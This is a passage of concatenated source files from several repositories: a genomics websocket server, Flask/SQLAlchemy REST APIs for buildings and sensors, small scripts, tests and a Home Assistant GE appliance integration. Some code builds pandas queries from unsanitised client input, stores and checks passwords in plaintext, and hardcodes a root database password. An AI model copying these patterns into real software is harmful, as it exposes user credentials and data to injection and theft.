"cut_vars": np.round(cut_vars, 6).tolist()
}
)
elif 'apadb_' in message :
_, seq_prox, prox_cut_start, prox_cut_end, seq_dist, dist_cut_start, dist_cut_end, site_distance = message.split("_")
prox_cut_start, prox_cut_end, dist_cut_start, dist_cut_end, site_distance = int(prox_cut_start), int(prox_cut_end), int(dist_cut_start), int(dist_cut_end), int(site_distance)
iso_pred, cut_prox, cut_dist = apadb_predict(seq_prox, prox_cut_start, prox_cut_end, seq_dist, dist_cut_start, dist_cut_end, site_distance)
return_json = json.dumps(
{
"return_action" : "apadb",
"iso" : str(round(iso_pred, 6)),
"cut_prox" : [round(cut, 6) for cut in cut_prox.tolist()],
"cut_dist" : [round(cut, 6) for cut in cut_dist.tolist()]
}
)
elif 'getsites_' in message :
_, gene = message.split("_")
gene_df = apadb_pair_df.query("gene == '" + gene + "'")
return_json = json.dumps(
{
"return_action" : "getsites",
"gene" : [str(row["gene"]) for _, row in gene_df.iterrows()],
"gene_id" : [str(row["gene_id"]) for _, row in gene_df.iterrows()],
"sitenum_prox" : [str(row["sitenum_prox"]) for _, row in gene_df.iterrows()],
"sitenum_dist" : [str(row["sitenum_dist"]) for _, row in gene_df.iterrows()],
"site_type_prox" : [str(row["site_type_prox"]) for _, row in gene_df.iterrows()],
"site_type_dist" : [str(row["site_type_dist"]) for _, row in gene_df.iterrows()]
}
)
elif 'getseqs_' in message :
_, gene_id = message.split("_")
gene_df = apadb_pair_df.query("gene_id == '" + gene_id + "'")
return_json = json.dumps(
{
"return_action" : "getseqs",
"gene" : str(gene_df["gene"].values[0]),
"gene_id" : str(gene_df["gene_id"].values[0]),
"chrom" : str(gene_df["chrom"].values[0]),
"strand" : str(gene_df["strand"].values[0]),
"sitenum_prox" : str(gene_df["sitenum_prox"].values[0]),
"sitenum_dist" : str(gene_df["sitenum_dist"].values[0]),
"site_type_prox" : str(gene_df["site_type_prox"].values[0]),
"site_type_dist" : str(gene_df["site_type_dist"].values[0]),
"seq_prox" : str(gene_df["seq_prox"].values[0]),
"seq_dist" : str(gene_df["seq_dist"].values[0]),
"site_distance" : str(gene_df["site_distance"].values[0]),
"cut_start_prox" : str(gene_df["rel_start_prox"].values[0]),
"cut_end_prox" : str(gene_df["rel_end_prox"].values[0]),
"cut_start_dist" : str(gene_df["rel_start_dist"].values[0]),
"cut_end_dist" : str(gene_df["rel_end_dist"].values[0]),
"cut_start_coord_prox" : str(gene_df["cut_start_prox"].values[0]),
"cut_end_coord_prox" : str(gene_df["cut_end_prox"].values[0]),
"cut_start_coord_dist" : str(gene_df["cut_start_dist"].values[0]),
"cut_end_coord_dist" : str(gene_df["cut_end_dist"].values[0])
}
)
elif 'getevents_' in message :
_, gene = message.split("_")
gene_df = apadb_df.query("gene == '" + gene + "'")
return_json = json.dumps(
{
"return_action" : "getevents",
"gene" : [str(row["gene"]) for _, row in gene_df.iterrows()],
"gene_id" : [str(row["gene_id"]) for _, row in gene_df.iterrows()],
"sitenum" : [str(row["sitenum"]) for _, row in gene_df.iterrows()],
"site_type" : [str(row["site_type"]) for _, row in gene_df.iterrows()]
}
)
elif 'getseq_' in message :
_, gene_id = message.split("_")
gene_df = apadb_df.query("gene_id == '" + gene_id + "'")
return_json = json.dumps(
{
"return_action" : "getseq",
"gene" : str(gene_df["gene"].values[0]),
"gene_id" : str(gene_df["gene_id"].values[0]),
"chrom" : str(gene_df["chrom"].values[0]),
"strand" : str(gene_df["strand"].values[0]),
"sitenum" : str(gene_df["sitenum"].values[0]),
"site_type" : str(gene_df["site_type"].values[0]),
"seq" : str(gene_df["seq"].values[0]),
"cut_start" : str(gene_df["rel_start"].values[0]),
"cut_end" : str(gene_df["rel_end"].values[0]),
"chrom" : str(gene_df["chrom"].values[0]),
"strand" : str(gene_df["strand"].values[0]),
"cut_start_coord" : str(gene_df["cut_start"].values[0]),
"cut_end_coord" : str(gene_df["cut_end"].values[0])
}
)
elif 'getgenes' == message :
return_json = json.dumps(
{
"return_action" : "getgenes",
"genes" : gene_list
}
)
elif 'getpairgenes' == message :
return_json = json.dumps(
{
"return_action" : "getgenes",
"genes" : pair_gene_list
}
)
await websocket.send(return_json)
print(f"> {return_json}")
loop = asyncio.get_event_loop()
# Create the server.
start_server = websockets.serve(hello, 'localhost', 9990)
server = loop.run_until_complete(start_server)
# Run the server until receiving SIGTERM.
stop = asyncio.Future()
loop.add_signal_handler(signal.SIGTERM, stop.set_result, None)
loop.run_until_complete(stop)
# Shut down the server.
server.close()
loop.run_until_complete(server.wait_closed())
``` |
{
"source": "8790/terminal_printer",
"score": 3
} |
#### File: printer/test/command_test.py
```python
from __future__ import print_function, absolute_import
import shlex
import random
import string
import unittest
from printer.run import *
from printer.painter import MESS_FILTERS, FONT_LIST
class CommandTester(unittest.TestCase):
def setUp(self):
_, self.parser = parser()
@staticmethod
def gen_rand(length):
return "".join(random.choice(string.digits + string.ascii_letters + ' ') for _ in range(length))
def test_init(self):
self.assertTrue(self.parser.parse_args(['-i']).init)
self.assertTrue(self.parser.parse_args(['--init']).init)
def test_text(self):
name = self.gen_rand(20)
self.assertEqual(name, self.parser.parse_args(shlex.split("--text '{}'".format(name))).text)
self.assertEqual(name, self.parser.parse_args(shlex.split("-t '{}'".format(name))).text)
self.assertEqual('HellFlame', self.parser.parse_args().text)
def test_color(self):
color = random.randrange(30, 50)
self.assertEqual(color, self.parser.parse_args(shlex.split("--color {}".format(color))).color)
self.assertEqual(color, self.parser.parse_args(shlex.split("-c {}".format(color))).color)
def test_filter(self):
f = random.randrange(1, len(MESS_FILTERS))
self.assertEqual(f, self.parser.parse_args(shlex.split("--filter {}".format(f))).filter)
self.assertEqual(f, self.parser.parse_args(shlex.split("-f {}".format(f))).filter)
self.assertEqual(73, self.parser.parse_args().filter)
def test_width_height(self):
w, h = random.randrange(1, 100), random.randrange(1, 100)
parse = self.parser.parse_args(shlex.split("--width {} --height {}".format(w, h)))
self.assertEqual(w, parse.width)
self.assertEqual(h, parse.height)
def test_gray(self):
self.assertTrue(self.parser.parse_args(['--gray']).gray)
self.assertTrue(self.parser.parse_args(['-g']).gray)
def test_keep_ratio(self):
self.assertTrue(self.parser.parse_args(['--keep-ratio']).keep_ratio)
self.assertTrue(self.parser.parse_args(['-kr']).keep_ratio)
def test_font(self):
f = random.randrange(0, len(FONT_LIST) - 1)
self.assertEqual(f, self.parser.parse_args(shlex.split('--font {}'.format(f))).font)
self.assertEqual(f, self.parser.parse_args(shlex.split('-F {}'.format(f))).font)
def test_reverse(self):
self.assertTrue(self.parser.parse_args(['-r']).reverse)
self.assertTrue(self.parser.parse_args(['--reverse']).reverse)
if __name__ == '__main__':
unittest.main(verbosity=2)
``` |
{
"source": "87boy/sisu",
"score": 3
} |
#### File: sisu/examples/my_sqlalchemy.py
```python
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True)
email = db.Column(db.String(120), unique=True)
def __init__(self, username, email):
self.username = username
self.email = email
# def __repr__(self):
# return '<User %r>' % self.username
# from my_sqlalchemy import db
# db.create_all()
# from my_sqlalchemy import User
# admin = User('admin', '<EMAIL>')
# guest = User('guest', '<EMAIL>')
# db.session.add(admin)
# db.session.add(guest)
# db.session.commit()
# users = User.query.all()
# print users
# print type(users)
# import json
# print json.dumps(users)
```
#### File: restful_api/restful_api/api.py
```python
from flask import Flask, request, jsonify
from flask.ext.restful import abort, Api, Resource, reqparse
from flask.ext.sqlalchemy import SQLAlchemy
# from config import *
from model import *
api = Api(app)
# stdlib
# from json import dumps
def to_json(model):
""" Returns a JSON representation of an SQLAlchemy-backed object. """
json = {}
# json['fields'] = {}
# json['pk'] = getattr(model, 'id')
for col in model._sa_class_manager.mapper.mapped_table.columns:
# json['fields'][col.name] = getattr(model, col.name)
json[col.name] = getattr(model, col.name)
# return dumps([json])
return json
def to_json_list(model_list):
json_list = []
for model in model_list:
json_list.append(to_json(model))
return json_list
class UserResource(Resource):
def get(self, user_id):
record = User.query.filter_by(id=user_id).first()
# return jsonify(json_list=record), 200
return to_json(record), 200
def put(self, user_id):
parser = reqparse.RequestParser()
parser.add_argument('password', type=str)
args = parser.parse_args(strict=True)
record = User.query.filter_by(id=user_id).first()
if record:
record.password = args['password']
db.session.commit()
return {'status': 'updated'}, 201
else:
return {'status': 'user not exist'}, 404
def delete(self, user_id):
record = User.query.filter_by(id=user_id).first()
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
class UserList(Resource):
def get(self):
record_list = User.query.all()
# return jsonify(json_list=[i.serialize for i in user_list]), 200
# results = []
# for idx in user_list:
# results.append(to_json(idx))
return to_json_list(record_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('username', type=str)
parser.add_argument('password', type=str)
parser.add_argument('email', type=str)
args = parser.parse_args(strict=True)
new_record = User(args['username'], args['password'], args['email'])
db.session.add(new_record)
result = db.session.commit()
# new_user = User(username, password, email)
# db.session.add(new_user)
# result = db.session.commit()
return new_record.id, 201
class Login(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('username', type=str)
parser.add_argument('password', type=str)
args = parser.parse_args()
user = User.query.filter_by(username=args['username']).first()
if user and (args['password'] == user.password):
return {'status': 'login successed'}, 200
else:
return {'status': 'login failed'}, 200
class BuildingResource(Resource):
def get(self, building_id):
record = Building.query.filter_by(id=building_id).first()
# return jsonify(json_list=record), 200
return to_json(record), 200
def put(self, building_id):
parser = reqparse.RequestParser()
parser.add_argument('name', type=unicode)
args = parser.parse_args(strict=True)
record = Building.query.filter_by(id=building_id).first()
if record:
record.name = args['name']
db.session.commit()
return {'status': 'updated'}, 201
else:
return {'status': 'building not exist!'}, 404
def delete(self, building_id):
record = Building.query.filter_by(id=building_id).first()
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
class BuildingList(Resource):
def get(self):
building_list = Building.query.all()
# return jsonify(json_list=[i.serialize for i in user_list]), 200
# results = []
# for idx in user_list:
# results.append(to_json(idx))
return to_json_list(building_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('name', type=unicode)
parser.add_argument('latitude', type=str)
parser.add_argument('longitude', type=str)
parser.add_argument('description', type=unicode)
args = parser.parse_args(strict=True)
new_record = Building(args['name'], args['latitude'], args['longitude'], args['description'])
db.session.add(new_record)
result = db.session.commit()
# new_user = User(username, password, email)
# db.session.add(new_user)
# result = db.session.commit()
return new_record.id, 201
class FloorResource(Resource):
def get(self, floor_id):
record = Floor.query.filter_by(id=floor_id).first()
# return jsonify(json_list=record), 200
return to_json(record), 200
def put(self, floor_id):
parser = reqparse.RequestParser()
parser.add_argument('name', type=unicode)
args = parser.parse_args()
record = Floor.query.filter_by(id=floor_id).first()
if record:
record.name = args['name']
db.session.commit()
return {'status': 'updated'}, 201
else:
return {'status': 'floor not exist'}, 404
def delete(self, floor_id):
record = Floor.query.filter_by(id=floor_id).first()
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
class FloorList(Resource):
def get(self):
floor_list = Floor.query.all()
# return jsonify(json_list=[i.serialize for i in user_list]), 200
# results = []
# for idx in user_list:
# results.append(to_json(idx))
return to_json_list(floor_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('building_id', type=int)
parser.add_argument('name', type=unicode)
parser.add_argument('description', type=unicode)
args = parser.parse_args(strict=True)
new_record = Floor(args['building_id'], args['name'], args['description'])
db.session.add(new_record)
result = db.session.commit()
# new_user = User(username, password, email)
# db.session.add(new_user)
# result = db.session.commit()
return new_record.id, 201
class RoomResource(Resource):
def get(self, room_id):
record = Room.query.filter_by(id=room_id).first()
# return jsonify(json_list=record), 200
return to_json(record), 200
def put(self, room_id):
parser = reqparse.RequestParser()
parser.add_argument('name', type=str)
args = parser.parse_args()
record = Room.query.filter_by(id=room_id).first()
if record:
record.name = args['name']
db.session.commit()
return {'status': 'updated'}, 201
else:
return {'status': 'room not exit'}, 404
def delete(self, room_id):
record = Room.query.filter_by(id=room_id).first()
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
class RoomList(Resource):
def get(self):
floor_list = Room.query.all()
return to_json_list(floor_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('floor_id', type=int)
parser.add_argument('name', type=unicode)
parser.add_argument('description', type=unicode)
args = parser.parse_args(strict=True)
new_record = Room(
args['floor_id'], args['name'], args['description'])
db.session.add(new_record)
db.session.commit()
return new_record.id, 201
class DeviceResource(Resource):
def get(self, device_id):
record = Device.query.filter_by(id=device_id).first()
if record is not None:
return to_json(record), 200
else:
return {'status': 'device not exit'}
def put(self, device_id):
parser = reqparse.RequestParser()
parser.add_argument('name', type=unicode)
args = parser.parse_args()
record = Device.query.filter_by(id=device_id).first()
if record:
record.name = args['name']
db.session.commit()
return {'status': 'updated'}, 201
else:
return {'status': 'device not exist!'}, 404
def delete(self, device_id):
record = Device.query.filter_by(id=device_id).first()
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
class DeviceList(Resource):
def get(self):
floor_list = Device.query.all()
return to_json_list(floor_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('room_id', type=int)
parser.add_argument('name', type=unicode)
parser.add_argument('description', type=unicode)
parser.add_argument('uuid', type=str)
args = parser.parse_args(strict=True)
new_record = Device(
args['room_id'], args['name'],
args['uuid'], args['description'])
db.session.add(new_record)
result = db.session.commit()
return new_record.id, 201
class sensorResource(Resource):
def get(self, sensor_id):
record = Sensor.query.filter_by(id=sensor_id).first()
if record is not None:
return to_json(record), 200
else:
return {"status": "sensor not exit"}
def put(self, sensor_id):
parser = reqparse.RequestParser()
parser.add_argument('name', type=str)
args = parser.parse_args()
record = Sensor.query.filter_by(id=sensor_id).first()
if record:
record.name = args['name']
db.session.commit()
return to_json(record), 201
else:
return {"status": "sensor not exit"}
def delete(self, sensor_id):
record = Sensor.query.filter_by(id=sensor_id).first()
if record is not None:
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
else:
return {"status": "sensor not exit"}
class sensorList(Resource):
def get(self):
floor_list = Sensor.query.all()
return to_json_list(floor_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('type', type=str, location='json')
parser.add_argument('name', type=unicode, location='json')
parser.add_argument('uuid', type=str, location='json')
parser.add_argument('description', type=unicode, location='json')
args = parser.parse_args(strict=True)
new_record = Sensor(
args['type'], args['name'], args['uuid'], args['description'])
db.session.add(new_record)
db.session.commit()
return new_record.id, 201
class DataResource(Resource):
def get(self, data_id):
record = SensorData.query.filter_by(id=data_id).first()
# return jsonify(json_list=record), 200
return to_json(record), 200
def put(self, data_id):
parser = reqparse.RequestParser()
parser.add_argument('value', type=str)
args = parser.parse_args()
record = SensorData.query.filter_by(id=data_id).first()
if record:
record.value = args['value']
db.session.commit()
return {"status": "updated"}, 201
else:
return {"status": "data not exit"}
def delete(self, data_id):
record = SensorData.query.filter_by(id=data_id).first()
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
class dList(Resource):
def get(self):
floor_list = SensorData.query.all()
return to_json_list(floor_list), 200
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('device_id', type=int)
parser.add_argument('sensor_id', type=int)
parser.add_argument('value', type=unicode)
parser.add_argument('datetime', type=str)
parser.add_argument('status', type=int)
args = parser.parse_args(strict=True)
new_record = SensorData(
args['device_id'], args['sensor_id'], args['value'],
args['datetime'], args['status'])
db.session.add(new_record)
db.session.commit()
return new_record.id, 201
# add a new device
class locationList(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('uuid', type=str)
parser.add_argument('build_name', type=unicode)
parser.add_argument('floor_name', type=str)
parser.add_argument('room_name', type=str)
parser.add_argument('device_name', type=str)
parser.add_argument('description', type=unicode)
args = parser.parse_args(strict=True)
buildInfor = Building.query.filter_by(
name=args['build_name']).first_or_404()
if buildInfor:
floorInfor = Floor.query.filter_by(
name=args['floor_name'],
building_id=buildInfor.id).first_or_404()
print args['room_name']
print floorInfor.id
if floorInfor:
roomInfor = Room.query.filter_by(
name=args['room_name'],
floor_id=floorInfor.id).first_or_404()
if roomInfor:
new_record = Device(
roomInfor.id, args['device_name'],
args['uuid'], args['description'])
db.session.add(new_record)
db.session.commit()
return {"status": "insert successful"}, 201
else:
return {"error": "floor not exit"}
else:
return {"error": "building not exit"}
# lookup, update, delete a device
class locationResource(Resource):
def get(self, uuid):
record = Device.query.filter_by(uuid=uuid).first()
if record:
try:
roomInfor = Room.query.filter_by(
id=record.room_id).first_or_404()
floorInfor = Floor.query.filter_by(
id=roomInfor.floor_id).first_or_404()
buildInfor = Building.query.filter_by(
id=floorInfor.building_id).first_or_404()
deviceInfor = {}
deviceInfor['floor_name'] = floorInfor.name
deviceInfor['room_name'] = roomInfor.name
deviceInfor['build_name'] = buildInfor.name
return deviceInfor, 200
except:
return {"warning": "you may input error information,\
please ask the Administrator"}
else:
return {"error": "device not exit"}
def put(self, uuid):
parser = reqparse.RequestParser()
parser.add_argument('uuid', type=str)
args = parser.parse_args()
record = Device.query.filter_by(uuid=uuid).first()
if record:
record.uuid = args['uuid']
db.session.commit()
return {"status": 'updated'}, 201
else:
return {"status": 'device not exit'}, 404
def delete(self, uuid):
record = Device.query.filter_by(uuid=uuid).first()
if record:
db.session.delete(record)
db.session.commit()
return {'status': 'deleted'}, 204
else:
return {'status': 'device not exit'}
class dataSensor(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('build_name', type=unicode)
parser.add_argument('floor_name', type=str)
parser.add_argument('room_name', type=str)
parser.add_argument('sensor_type', type=str)
args = parser.parse_args(strict=True)
buildInfor = Building.query.filter_by(
name=args['build_name']).first_or_404()
if buildInfor:
floorInfor = Floor.query.filter_by(
name=args['floor_name'],
building_id=buildInfor.id).first_or_404()
if floorInfor:
roomInfor = Room.query.filter_by(
name=args['room_name'],
floor_id=floorInfor.id).first_or_404()
if roomInfor:
deviceInfor = Device.query.filter_by(
room_id=roomInfor.id).first_or_404()
sensorInfor = Sensor.query.filter_by(
type=args['sensor_type']).first_or_404()
if sensorInfor and deviceInfor:
buf = SensorData.query.filter_by(
sensor_id=sensorInfor.id,
device_id=deviceInfor.id
).order_by('datetime desc').limit(10)
if buf is not None:
return to_json_list(buf), 201
else:
return {"status": "no data"}
else:
return {"status": "no data"}
class dataList(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('build_name', type=unicode)
parser.add_argument('floor_name', type=str)
parser.add_argument('room_name', type=str)
args = parser.parse_args(strict=True)
buildInfor = Building.query.filter_by(
name=args['build_name']).first_or_404()
if buildInfor:
floorInfor = Floor.query.filter_by(
name=args['floor_name'],
building_id=buildInfor.id).first_or_404()
if floorInfor:
roomInfor = Room.query.filter_by(
name=args['room_name'],
floor_id=floorInfor.id).first_or_404()
if roomInfor:
deviceInfor = Device.query.filter_by(
room_id=roomInfor.id).first_or_404()
if deviceInfor:
result = SensorData.query.filter_by(
device_id=deviceInfor.id
).order_by('datetime desc').limit(10)
return to_json_list(result), 201
class locationInfor(Resource):
def get(self):
locaList = []
rooms = Room.query.all()
if rooms:
for room in rooms:
location = {}
location['room_name'] = room.name
floors = Floor.query.filter_by(id=room.floor_id).all()
if floors:
for floor in floors:
location['floor_name'] = floor.name
build = Building.query.filter_by(
id=floor.building_id).all()
if build is not None:
location['build_name'] = build[0].name
locaList.append(location)
else:
return {'status': 'the building not exit'}
else:
return {'status': 'the floor not exit'}
else:
return {'status': 'the room not exit'}
return locaList
api.add_resource(UserList, '/user', '/user/')
api.add_resource(UserResource, '/user/<user_id>')
api.add_resource(Login, '/login', '/login/')
api.add_resource(BuildingList, '/building', '/building/')
api.add_resource(BuildingResource, '/building/<building_id>')
api.add_resource(FloorList, '/floor', '/floor/')
api.add_resource(FloorResource, '/floor/<floor_id>')
api.add_resource(RoomList, '/room', '/room/')
api.add_resource(RoomResource, '/room/<room_id>')
api.add_resource(DeviceList, '/device', '/device/')
api.add_resource(DeviceResource, '/device/<device_id>')
api.add_resource(dList, '/data', '/data/')
api.add_resource(DataResource, '/data/<data_id>')
api.add_resource(sensorList, '/sensor', '/sensor/')
api.add_resource(sensorResource, '/sensor/<sensor_id>')
api.add_resource(locationResource, '/location/<uuid>')
api.add_resource(locationList, '/location', '/location/')
api.add_resource(dataSensor, '/type/data', '/type/data/')
api.add_resource(dataList, '/all/data', '/all/data/')
api.add_resource(locationInfor, '/get/location', '/get/location/')
if __name__ == '__main__':
app.run(debug=True)
```
#### File: restless_api/restless_api/model.py
```python
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
import flask.ext.restless
from config import *
# Create the Flask application and the Flask-SQLAlchemy object.
app = Flask(__name__)
app.config['DEBUG'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = SQLALCHEMY_DATABASE_URI
db = SQLAlchemy(app)
# Create your Flask-SQLALchemy models as usual but with the following two
# (reasonable) restrictions:
# 1. They must have a primary key column of type sqlalchemy.Integer or
# type sqlalchemy.Unicode.
# 2. They must have an __init__ method which accepts keyword arguments for
# all columns (the constructor in flask.ext.sqlalchemy.SQLAlchemy.Model
# supplies such a method, so you don't need to declare a new one).
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, nullable=False)
username = db.Column(db.String(255), unique=True, nullable=False)
password = db.Column(db.String(255), nullable=False)
email = db.Column(db.String(255), unique=True, nullable=False)
def __init__(self, username, password, email):
self.username = username
self.password = password
self.email = email
class Building(db.Model):
__tablename__ = 'building'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.String(255), nullable=False)
latitude = db.Column(db.String(255))
longitude = db.Column(db.String(255))
description = db.Column(db.String(255))
relationship = db.relationship('Floor', backref='building', lazy='dynamic')
class Floor(db.Model):
__tablename__ = 'floor'
id = db.Column(db.Integer, primary_key=True, nullable=False)
building_id = db.Column(
db.Integer, db.ForeignKey('building.id'), nullable=False)
name = db.Column(db.String(255), nullable=False)
description = db.Column(db.String(255))
relationship = db.relationship('Room', backref='floor', lazy='dynamic')
class Room(db.Model):
__tablename__ = 'room'
id = db.Column(db.Integer, primary_key=True, nullable=False)
floor_id = db.Column(db.Integer, db.ForeignKey('floor.id'), nullable=False)
name = db.Column(db.String(255), nullable=False)
description = db.Column(db.String(255))
relationship = db.relationship('Device', backref='room', lazy='dynamic')
class Device(db.Model):
__tablename__ = 'device'
id = db.Column(db.Integer, primary_key=True, nullable=False)
room_id = db.Column(db.Integer, db.ForeignKey('room.id'), nullable=False)
name = db.Column(db.String(255), nullable=False)
description = db.Column(db.String(255))
relationship = db.relationship(
'SensorData', backref='device', lazy='dynamic')
class Sensor(db.Model):
__tablename__ = 'sensor'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.String(255), nullable=False)
type = db.Column(db.String(255), nullable=False)
description = db.Column(db.String(255))
relationship = db.relationship(
'SensorData', backref='sensor', lazy='dynamic')
class SensorData(db.Model):
__tablename__ = 'sensor_data'
id = db.Column(db.Integer, primary_key=True, nullable=False)
sensor_id = db.Column(
db.Integer, db.ForeignKey('sensor.id'), nullable=False)
device_id = db.Column(
db.Integer, db.ForeignKey('device.id'), nullable=False)
value = db.Column(db.Float)
datetime = db.Column(db.DateTime)
status = db.Column(db.Integer)
# Create the database tables.
# db.create_all()
``` |
{
"source": "87-midnight/NewbieInProgramin",
"score": 3
} |
#### File: packages/mysql/user_operate.py
```python
import sys
sys.path.append("J:\\NewbieInPrograming\\python-code\\packages\\mysql\\")
from sys_user import User
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
# 初始化数据库连接:
engine = create_engine('mysql+pymysql://root:123456@localhost:3306/test?charset=utf8')
# 创建DBSession类型:
DBSession = sessionmaker(bind=engine)
session = DBSession()
def create_user():
# 创建新User对象:
new_user = User(id=3, name='john',gender='male',address='河北')
user1 = User(id=4,name='amy',gender='female',address='天津')
print(new_user.__tablename__)
print(new_user.id)
print(user1.id)
# 添加到session:
session.add(new_user)
session.add(user1)
# 提交即保存到数据库:
session.commit()
def query_user():
list_ = session.query(User).all()
for item in list_:
print("查询结果:", item)
def get_user_id(id_=None):
if id_ is None:
return "no id set up"
return session.query(User).filter(User.id == id_).one()
if __name__ == '__main__':
# create_user()
query_user()
print("获取单个用户:", get_user_id(1))
# 关闭session:
session.close()
```
#### File: packages/scheduledTask/simple_job.py
```python
from datetime import datetime
import time
def job_exec_per_sec(seconds):
"""
通过循环方式+sleep实现定时任务
:param seconds: 定时任务周期间隔描述
:return: 无返回
"""
while True:
print("while循环定时任务执行了,时间:%s" % datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
time.sleep(seconds)
if __name__ == '__main__':
job_exec_per_sec(10)
``` |
{
"source": "87racer/ha_gehome",
"score": 2
} |
#### File: ge_home/devices/base.py
```python
import asyncio
import logging
from typing import Dict, List, Optional
from gehomesdk import GeAppliance
from gehomesdk.erd import ErdCode, ErdCodeType, ErdApplianceType
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from ..const import DOMAIN
_LOGGER = logging.getLogger(__name__)
class ApplianceApi:
"""
API class to represent a single physical device.
Since a physical device can have many entities, we"ll pool common elements here
"""
APPLIANCE_TYPE = None # type: Optional[ErdApplianceType]
def __init__(self, coordinator: DataUpdateCoordinator, appliance: GeAppliance):
if not appliance.initialized:
raise RuntimeError("Appliance not ready")
self._appliance = appliance
self._loop = appliance.client.loop
self._hass = coordinator.hass
self.coordinator = coordinator
self.initial_update = False
self._entities = {} # type: Optional[Dict[str, Entity]]
@property
def hass(self) -> HomeAssistant:
return self._hass
@property
def loop(self) -> Optional[asyncio.AbstractEventLoop]:
if self._loop is None:
self._loop = self._appliance.client.loop
return self._loop
@property
def appliance(self) -> GeAppliance:
return self._appliance
@appliance.setter
def appliance(self, value: GeAppliance):
self._appliance = value
@property
def available(self) -> bool:
#Note - online will be there since we're using the GE coordinator
#Didn't want to deal with the circular references to get the type hints
#working.
return self.appliance.available and self.coordinator.online
@property
def serial_number(self) -> str:
return self.appliance.get_erd_value(ErdCode.SERIAL_NUMBER)
@property
def mac_addr(self) -> str:
return self.appliance.mac_addr
@property
def serial_or_mac(self) -> str:
if self.serial_number and not self.serial_number.isspace():
return self.serial_number
return self.mac_addr
@property
def model_number(self) -> str:
return self.appliance.get_erd_value(ErdCode.MODEL_NUMBER)
@property
def sw_version(self) -> str:
appVer = self.try_get_erd_value(ErdCode.APPLIANCE_SW_VERSION)
wifiVer = self.try_get_erd_value(ErdCode.WIFI_MODULE_SW_VERSION)
return 'Appliance=' + str(appVer or 'Unknown') + '/Wifi=' + str(wifiVer or 'Unknown')
@property
def name(self) -> str:
appliance_type = self.appliance.appliance_type
if appliance_type is None or appliance_type == ErdApplianceType.UNKNOWN:
appliance_type = "Appliance"
else:
appliance_type = appliance_type.name.replace("_", " ").title()
return f"GE {appliance_type} {self.serial_or_mac}"
@property
def device_info(self) -> Dict:
"""Device info dictionary."""
return {
"identifiers": {(DOMAIN, self.serial_or_mac)},
"name": self.name,
"manufacturer": "GE",
"model": self.model_number,
"sw_version": self.sw_version
}
@property
def entities(self) -> List[Entity]:
return list(self._entities.values())
def get_all_entities(self) -> List[Entity]:
"""Create Entities for this device."""
return self.get_base_entities()
def get_base_entities(self) -> List[Entity]:
"""Create base entities (i.e. common between all appliances)."""
from ..entities import GeErdSensor, GeErdSwitch
entities = [
GeErdSensor(self, ErdCode.CLOCK_TIME),
GeErdSwitch(self, ErdCode.SABBATH_MODE),
]
return entities
def build_entities_list(self) -> None:
"""Build the entities list, adding anything new."""
from ..entities import GeErdEntity, GeErdButton
entities = [
e for e in self.get_all_entities()
if not isinstance(e, GeErdEntity) or isinstance(e, GeErdButton) or e.erd_code in self.appliance.known_properties
]
for entity in entities:
if entity.unique_id not in self._entities:
self._entities[entity.unique_id] = entity
def try_get_erd_value(self, code: ErdCodeType):
try:
return self.appliance.get_erd_value(code)
except:
return None
def has_erd_code(self, code: ErdCodeType):
try:
self.appliance.get_erd_value(code)
return True
except:
return False
```
#### File: ge_home/devices/coffee_maker.py
```python
import logging
from typing import List
from homeassistant.helpers.entity import Entity
from gehomesdk import (
GeAppliance,
ErdCode,
ErdApplianceType,
ErdCcmBrewSettings
)
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from .base import ApplianceApi
from ..entities import (
GeCcmPotNotPresentBinarySensor,
GeErdSensor,
GeErdBinarySensor,
GeErdButton,
GeCcmBrewStrengthSelect,
GeCcmBrewTemperatureNumber,
GeCcmBrewCupsNumber,
GeCcmBrewSettingsButton
)
_LOGGER = logging.getLogger(__name__)
class CcmApi(ApplianceApi):
"""API class for Cafe Coffee Maker objects"""
APPLIANCE_TYPE = ErdApplianceType.CAFE_COFFEE_MAKER
def __init__(self, coordinator: DataUpdateCoordinator, appliance: GeAppliance):
super().__init__(coordinator, appliance)
self._brew_strengh_entity = GeCcmBrewStrengthSelect(self)
self._brew_temperature_entity = GeCcmBrewTemperatureNumber(self)
self._brew_cups_entity = GeCcmBrewCupsNumber(self)
def get_all_entities(self) -> List[Entity]:
base_entities = super().get_all_entities()
ccm_entities = [
GeErdBinarySensor(self, ErdCode.CCM_IS_BREWING),
GeErdBinarySensor(self, ErdCode.CCM_IS_DESCALING),
GeCcmBrewSettingsButton(self),
GeErdButton(self, ErdCode.CCM_CANCEL_DESCALING),
GeErdButton(self, ErdCode.CCM_START_DESCALING),
GeErdButton(self, ErdCode.CCM_CANCEL_BREWING),
self._brew_strengh_entity,
self._brew_temperature_entity,
